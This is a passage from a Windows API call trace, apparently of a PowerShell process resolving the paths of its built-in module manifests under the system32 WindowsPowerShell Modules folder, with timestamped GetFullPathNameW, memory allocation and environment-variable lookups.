lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\International.psd1", lpFilePart=0x0) returned 0x53 [0286.625] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\iSCSI.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\iSCSI.psd1", lpFilePart=0x0) returned 0x43 [0286.625] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f83130 [0286.625] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f83130, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.625] CoTaskMemFree (pv=0x25b73f83130) [0286.626] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\iSCSI.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\iSCSI.psd1", lpFilePart=0x0) returned 0x43 [0286.626] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\ISE.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\ISE.psd1", lpFilePart=0x0) returned 0x3f [0286.626] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f84010 [0286.626] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f84010, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.626] CoTaskMemFree (pv=0x25b73f84010) [0286.626] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\ISE.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\ISE.psd1", lpFilePart=0x0) returned 0x3f [0286.626] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\Kds.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\Kds.psd1", lpFilePart=0x0) returned 0x3f [0286.626] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7e290 [0286.626] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7e290, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.626] CoTaskMemFree (pv=0x25b73f7e290) [0286.626] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\Kds.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Kds\\Kds.psd1", lpFilePart=0x0) returned 0x3f [0286.626] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", lpFilePart=0x0) returned 0x6d [0286.626] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7e8f0 [0286.626] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7e8f0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.626] CoTaskMemFree (pv=0x25b73f7e8f0) [0286.626] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", lpFilePart=0x0) returned 0x6d [0286.627] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\MMAgent.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\MMAgent.psd1", lpFilePart=0x0) returned 0x47 [0286.627] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7f390 [0286.627] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7f390, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.627] CoTaskMemFree (pv=0x25b73f7f390) [0286.627] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\MMAgent.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\MMAgent.psd1", lpFilePart=0x0) returned 0x47 [0286.627] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\MsDtc.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\MsDtc.psd1", lpFilePart=0x0) returned 0x43 [0286.627] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7e290 [0286.627] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7e290, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.627] CoTaskMemFree (pv=0x25b73f7e290) [0286.627] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\MsDtc.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\MsDtc.psd1", lpFilePart=0x0) returned 0x43 [0286.627] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\NetAdapter.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\NetAdapter.psd1", lpFilePart=0x0) returned 0x4d [0286.627] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f82f10 [0286.627] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f82f10, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.627] CoTaskMemFree (pv=0x25b73f82f10) [0286.627] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\NetAdapter.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetAdapter\\NetAdapter.psd1", lpFilePart=0x0) returned 0x4d [0286.628] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\NetConnection.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\NetConnection.psd1", lpFilePart=0x0) returned 0x53 [0286.628] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f819d0 [0286.628] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f819d0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.628] CoTaskMemFree (pv=0x25b73f819d0) [0286.628] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\NetConnection.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetConnection\\NetConnection.psd1", lpFilePart=0x0) returned 0x53 [0286.628] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\NetEventPacketCapture.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\NetEventPacketCapture.psd1", lpFilePart=0x0) returned 0x63 [0286.628] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f82030 [0286.628] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f82030, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.628] CoTaskMemFree (pv=0x25b73f82030) [0286.628] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\NetEventPacketCapture.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetEventPacketCapture\\NetEventPacketCapture.psd1", lpFilePart=0x0) returned 0x63 [0286.628] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\NetLbfo.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\NetLbfo.psd1", lpFilePart=0x0) returned 0x47 [0286.628] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7cd50 [0286.628] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7cd50, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.628] CoTaskMemFree (pv=0x25b73f7cd50) [0286.628] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\NetLbfo.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetLbfo\\NetLbfo.psd1", lpFilePart=0x0) returned 0x47 [0286.629] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat\\NetNat.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat\\NetNat.psd1", lpFilePart=0x0) returned 0x45 [0286.629] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f82030 [0286.629] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f82030, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.629] CoTaskMemFree (pv=0x25b73f82030) [0286.629] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat\\NetNat.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetNat\\NetNat.psd1", lpFilePart=0x0) returned 0x45 [0286.629] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos\\NetQos.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos\\NetQos.psd1", lpFilePart=0x0) returned 0x45 [0286.629] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7da10 [0286.629] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7da10, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.629] CoTaskMemFree (pv=0x25b73f7da10) [0286.629] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos\\NetQos.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetQos\\NetQos.psd1", lpFilePart=0x0) returned 0x45 [0286.629] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity\\NetSecurity.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity\\NetSecurity.psd1", lpFilePart=0x0) returned 0x4f [0286.629] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7f9f0 [0286.629] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7f9f0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.629] CoTaskMemFree (pv=0x25b73f7f9f0) [0286.629] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity\\NetSecurity.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSecurity\\NetSecurity.psd1", lpFilePart=0x0) returned 0x4f [0286.630] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\NetSwitchTeam.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\NetSwitchTeam.psd1", lpFilePart=0x0) returned 0x53 [0286.630] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f84010 [0286.630] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f84010, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.630] CoTaskMemFree (pv=0x25b73f84010) [0286.630] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\NetSwitchTeam.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetSwitchTeam\\NetSwitchTeam.psd1", lpFilePart=0x0) returned 0x53 [0286.630] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP\\NetTCPIP.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP\\NetTCPIP.psd1", lpFilePart=0x0) returned 0x49 [0286.630] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7f9f0 [0286.630] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7f9f0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.630] CoTaskMemFree (pv=0x25b73f7f9f0) [0286.630] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP\\NetTCPIP.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetTCPIP\\NetTCPIP.psd1", lpFilePart=0x0) returned 0x49 [0286.630] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus\\NetworkConnectivityStatus.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus\\NetworkConnectivityStatus.psd1", lpFilePart=0x0) returned 0x6b [0286.630] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7d3b0 [0286.630] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7d3b0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.630] CoTaskMemFree (pv=0x25b73f7d3b0) [0286.630] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus\\NetworkConnectivityStatus.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkConnectivityStatus\\NetworkConnectivityStatus.psd1", lpFilePart=0x0) returned 0x6b [0286.631] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkSwitchManager\\NetworkSwitchManager.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkSwitchManager\\NetworkSwitchManager.psd1", lpFilePart=0x0) returned 0x61 [0286.631] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f84450 [0286.631] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f84450, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.631] CoTaskMemFree (pv=0x25b73f84450) [0286.631] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkSwitchManager\\NetworkSwitchManager.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkSwitchManager\\NetworkSwitchManager.psd1", lpFilePart=0x0) returned 0x61 [0286.643] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkTransition\\NetworkTransition.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkTransition\\NetworkTransition.psd1", lpFilePart=0x0) returned 0x5b [0286.643] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f83130 [0286.643] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f83130, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.643] CoTaskMemFree (pv=0x25b73f83130) [0286.643] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkTransition\\NetworkTransition.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\NetworkTransition\\NetworkTransition.psd1", lpFilePart=0x0) returned 0x5b [0286.643] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PcsvDevice\\PcsvDevice.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PcsvDevice\\PcsvDevice.psd1", lpFilePart=0x0) returned 0x4d [0286.643] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f81150 [0286.643] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f81150, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.643] CoTaskMemFree (pv=0x25b73f81150) [0286.643] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PcsvDevice\\PcsvDevice.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PcsvDevice\\PcsvDevice.psd1", lpFilePart=0x0) returned 0x4d [0286.644] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PKI\\PKI.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PKI\\PKI.psd1", lpFilePart=0x0) returned 0x3f [0286.644] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7e290 [0286.644] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7e290, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.644] CoTaskMemFree (pv=0x25b73f7e290) [0286.644] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PKI\\PKI.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PKI\\PKI.psd1", lpFilePart=0x0) returned 0x3f [0286.644] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PnpDevice\\PnpDevice.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PnpDevice\\PnpDevice.psd1", lpFilePart=0x0) returned 0x4b [0286.644] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7fe30 [0286.644] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7fe30, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.644] CoTaskMemFree (pv=0x25b73f7fe30) [0286.644] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PnpDevice\\PnpDevice.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PnpDevice\\PnpDevice.psd1", lpFilePart=0x0) returned 0x4b [0286.644] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PrintManagement\\PrintManagement.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PrintManagement\\PrintManagement.psd1", lpFilePart=0x0) returned 0x57 [0286.644] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7c6f0 [0286.644] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7c6f0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.644] CoTaskMemFree (pv=0x25b73f7c6f0) [0286.644] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PrintManagement\\PrintManagement.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PrintManagement\\PrintManagement.psd1", lpFilePart=0x0) returned 0x57 [0286.645] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", lpFilePart=0x0) returned 0x6f [0286.645] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f81bf0 [0286.645] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f81bf0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.645] CoTaskMemFree (pv=0x25b73f81bf0) [0286.645] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", lpFilePart=0x0) returned 0x6f [0286.645] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", lpFilePart=0x0) returned 0x53 [0286.645] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7e8f0 [0286.645] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7e8f0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.645] CoTaskMemFree (pv=0x25b73f7e8f0) [0286.645] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", lpFilePart=0x0) returned 0x53 [0286.645] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", lpFilePart=0x0) returned 0x55 [0286.645] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f84230 [0286.645] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f84230, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.645] CoTaskMemFree (pv=0x25b73f84230) [0286.645] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", lpFilePart=0x0) returned 0x55 [0286.645] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow\\PSWorkflow.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow\\PSWorkflow.psd1", lpFilePart=0x0) returned 0x4d [0286.646] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f84450 [0286.646] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f84450, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.646] CoTaskMemFree (pv=0x25b73f84450) [0286.646] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow\\PSWorkflow.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow\\PSWorkflow.psd1", lpFilePart=0x0) returned 0x4d [0286.646] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility\\PSWorkflowUtility.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility\\PSWorkflowUtility.psd1", lpFilePart=0x0) returned 0x5b [0286.646] CoTaskMemAlloc (cb=0x20e) returned 0x25b73f7fe30 [0286.646] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73f7fe30, nSize=0x105 | out: lpBuffer="") returned 0x0 [0286.646] CoTaskMemFree (pv=0x25b73f7fe30) [0286.646] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility\\PSWorkflowUtility.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d310, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility\\PSWorkflowUtility.psd1", lpFilePart=0x0) returned 0x5b [0286.646] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ScheduledTasks\\ScheduledTasks.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d490, lpFilePart=0x0 | out: 